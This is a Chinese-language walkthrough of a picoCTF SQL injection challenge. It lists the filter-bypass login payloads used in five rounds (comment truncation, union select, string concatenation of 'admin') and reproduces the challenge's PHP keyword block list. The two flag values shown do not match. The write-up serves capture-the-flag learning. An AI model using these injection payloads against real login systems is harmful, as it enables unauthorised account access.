If the flag is not displayed after completing this challenge, try clearing your cookies. Cookies set by other challenges may prevent the flag from displaying properly.
Description
Can you beat the filters? Log in as admin
http://jupiter.challenges.picoctf.org:29164/
http://jupiter.challenges.picoctf.org:29164/filter.phpHints
You are not allowed to login with valid credentials.
Write down the injections you use in case you lose your progress.
For some filters it may be hard to see the characters, always (always)
look at the raw hex in the response.sqlite
If your cookie keeps getting reset, try using a private browser window
按照提示,需要用admin登录,查看filter.php,这应该是一个SQL注入题,提示我们可以使用无痕浏览器来以便cookie可以不用每次清除
使用admin随便试一下登录得到sql:
SELECT * FROM users WHERE username='admin' AND password='1’
Round1: or
提示sql过滤or,我们使用
username:admin' --
SELECT * FROM users WHERE username='admin' -- ' AND password='1’
Round2: or and like = –
username:admin' union select * from users where '1
SELECT * FROM users WHERE username='admin' union select * from users where '1' AND password='1’
Round3: or and = like > < –
username:admin';
SELECT * FROM users WHERE username='admin';' AND password='1’
Round4: or and = like > < – admin
username:ad'||'min';
SELECT * FROM users WHERE username='ad'||'min';' AND password='1’
Round5: or and = like > < – union admin
username:ad'||'min';
SELECT * FROM users WHERE username='ad'||'min';' AND password='1’
继续刷新filter.php 页面得到flag:picoCTF{y0u_m4d3_1t_a3ed4355668e74af0ecbb7496c8dd7c5}
最终filter.php 中展示了sql过滤逻辑,可以回味一下,尝试用不同的关键字来注入
<?php
session_start();
if (!isset($_SESSION["round"])) {
$_SESSION["round"] = 1;
}
$round = $_SESSION["round"];
$filter = array("");
$view = ($_SERVER["PHP_SELF"] == "/filter.php");
if ($round === 1) {
$filter = array("or");
if ($view) {
echo "Round1: ".implode(" ", $filter)."<br/>";
}
} else if ($round === 2) {
$filter = array("or", "and", "like", "=", "--");
if ($view) {
echo "Round2: ".implode(" ", $filter)."<br/>";
}
} else if ($round === 3) {
$filter = array(" ", "or", "and", "=", "like", ">", "<", "--");
// $filter = array("or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
if ($view) {
echo "Round3: ".implode(" ", $filter)."<br/>";
}
} else if ($round === 4) {
$filter = array(" ", "or", "and", "=", "like", ">", "<", "--", "admin");
// $filter = array(" ", "/**/", "--", "or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
if ($view) {
echo "Round4: ".implode(" ", $filter)."<br/>";
}
} else if ($round === 5) {
$filter = array(" ", "or", "and", "=", "like", ">", "<", "--", "union", "admin");
// $filter = array("0", "unhex", "char", "/*", "*/", "--", "or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
if ($view) {
echo "Round5: ".implode(" ", $filter)."<br/>";
}
} else if ($round >= 6) {
if ($view) {
highlight_file("filter.php");
}
} else {
$_SESSION["round"] = 1;
}
// picoCTF{y0u_m4d3_1t_a3ed4355668e74af0ecbb7496c8dd7c7}
?>
442
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
